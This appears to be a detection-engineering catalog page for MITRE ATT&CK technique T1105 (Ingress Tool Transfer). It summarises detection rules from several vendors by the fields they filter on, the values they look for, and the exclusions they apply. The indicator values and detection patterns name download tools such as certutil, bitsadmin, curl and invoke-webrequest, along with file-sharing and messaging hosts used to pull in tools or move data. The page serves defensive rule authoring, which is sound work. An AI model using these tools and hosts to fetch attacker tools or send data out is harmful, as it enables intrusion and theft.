Ingress Tool Transfer T1105

Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp. Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer).

Events covered

22 catalog events are tagged with this technique by at least one rule.

Authoring guide

Patterns shared across the 191 rules above: which fields they filter on, what specific values they look for, and what they exclude. The catalog normalizes field names across vendors so Sigma's Image, Elastic's process.name, and Splunk's process_name collapse into one row. Each rule contributes at most once per row.

Fields filtered most (59 distinct)

The fields most rules look at when detecting this technique. The How column shows the operators authors use (eq, wildcard, regex_match, match) and how often each appears. Sample values are concrete examples to start from, not an exhaustive list.

FieldRulesHowSample values
CommandLine111contains 68, regex_match 26, in 11, match 10, wildcard 4, ends_with 2http, /create , %appdata%, /addfile , /transfer
Image74ends_with 56, contains 9, eq 9, regex_match 8, starts_with 6, in 1, wildcard 1\curl.exe, \bitsadmin.exe, \certutil.exe, \brave.exe, \powershell.exe
EventID59eq 594688, 1, 4104, 4103, 15
process_name48eq 30, match 8, regex_match 7, in 3certutil.exe, bitsadmin.exe, (?i)certutil, cmd.exe, curl.exe
OriginalFileName36eq 36bitsadmin.exe, certutil.exe, powershell.exe, powershell_ise.exe, pwsh.dll
event.type19eq 19start, creation
Type16eq 16
parent_process_name16eq 12, in 2, regex_match 2cmd.exe, explorer.exe, conhost.exe, (?i)\x5cUsers\x5cPublic\x5c\.exe, cscript.exe
process.args13eq 9, wildcard 5, starts_with 4, contains 2, ends_with 1*http*, $*$*;set-alias, &&, &{', *Create*
TargetFilename10ends_with 4, contains 3, eq 2, regex_match 1.7z, .ahk, .aspx, .au3, .bat
Initiated9eq 9true, egress, outgoing
ParentImage6ends_with 4, eq 2/bun, /node, \bun.exe, \desktopimgdownldr.exe, \node.exe
ScriptBlockText5contains 4, in 2, match 1, regex_match 1ftp://, http://, (\"?(https?:\/\/(?:www\.)?[-a-za-z0-9@:%._\+~#=]{1,256}\...., *http:*, *https:*
DestinationHostname4ends_with 3, contains 1.githubusercontent.com, anonfiles.com, cdn.discordapp.com, api.dropboxapi.com, api.telegram.org
Product4eq 4The curl executable

Top indicator values (1161 distinct)

Specific (field, operator, value) combinations the rules check for, ranked by how many rules under this technique use each one. The Corpus reach column counts how many rules across the entire catalog (any technique) check the same combination. High numbers point to widely-used indicators that are likely noisy on their own; combine them with another condition for useful signal. Blank means the combination is specific to rules under this technique. Click a value to expand the rules under this technique that use it.

FieldKindValueRules (here)Corpus reach
EventIDeq
4688
19312
EventIDeq
1
16232
EventIDeq
4104
15268
EventIDeq
4103
10105
event.typeeq
start
16241
CommandLinecontains
http
1438
CommandLinecontains
curl
812
CommandLinecontains
/create
515
CommandLinecontains
%appdata%
513
CommandLinecontains
%public%
57
CommandLinecontains
%temp%
516
CommandLinecontains
%tmp%
515
CommandLinecontains
invoke-webrequest
513
CommandLinecontains
iwr
513
CommandLinecontains
/addfile
45
CommandLinecontains
/transfer
45
CommandLinecontains
wget
48
Initiatedeq
true
848
Imageends_with
\curl.exe
730
Imageends_with
\bitsadmin.exe
629
Imageends_with
\certutil.exe
644
process_nameeq
powershell.exe
799
process_nameeq
certutil.exe
522
process_nameeq
cmd.exe
575
process_nameeq
curl.exe
510
process_nameeq
msiexec.exe
522
OriginalFileNameeq
bitsadmin.exe
612
OriginalFileNameeq
certutil.exe
621
OriginalFileNameeq
powershell.exe
5121
parent_process_nameeq
explorer.exe
620

Exclusions (300 distinct)

Field/operator/value combinations excluded by rules under this technique (top-level not() clauses), sorted by how many rules exclude each. These are the false-positive paths the community has learned to filter out. A new rule that ignores the high-count entries here will likely fire on the same noisy paths. Click a value to expand the rules under this technique that exclude it.

FieldKindValueRules excluding
dest_ipcidr_match
10.0.0.0/8
4
dest_ipcidr_match
127.0.0.0/8
4
dest_ipcidr_match
169.254.0.0/16
4
dest_ipcidr_match
172.16.0.0/12
4
dest_ipcidr_match
192.168.0.0/16
4
dest_ipcidr_match
100.64.0.0/10
3
dest_ipcidr_match
192.0.0.0/24
3
dest_ipcidr_match
192.0.0.0/29
3
dest_ipcidr_match
192.0.0.10/32
3
dest_ipcidr_match
192.0.0.170/32
3
dest_ipcidr_match
192.0.0.171/32
3
dest_ipcidr_match
192.0.0.8/32
3
dest_ipcidr_match
192.0.0.9/32
3
CommandLinematch
(?i):\x5cProgramData\x5cDell\x5cUpdateService\x5cTemp\x5c
3
CommandLineregex_match
(?i)(^|\s|\;|\|)(iex|iwr)(\s|\;|\|)
3

Rules under this technique

Every rule in the catalog tagged with this technique, grouped by vendor. Click a rule title for its full predicates, exclusions, and indicators.

Sigma 80 rules

Elastic 22 rules

Splunk 76 rules

Kusto 5 rules

YARA-L 8 rules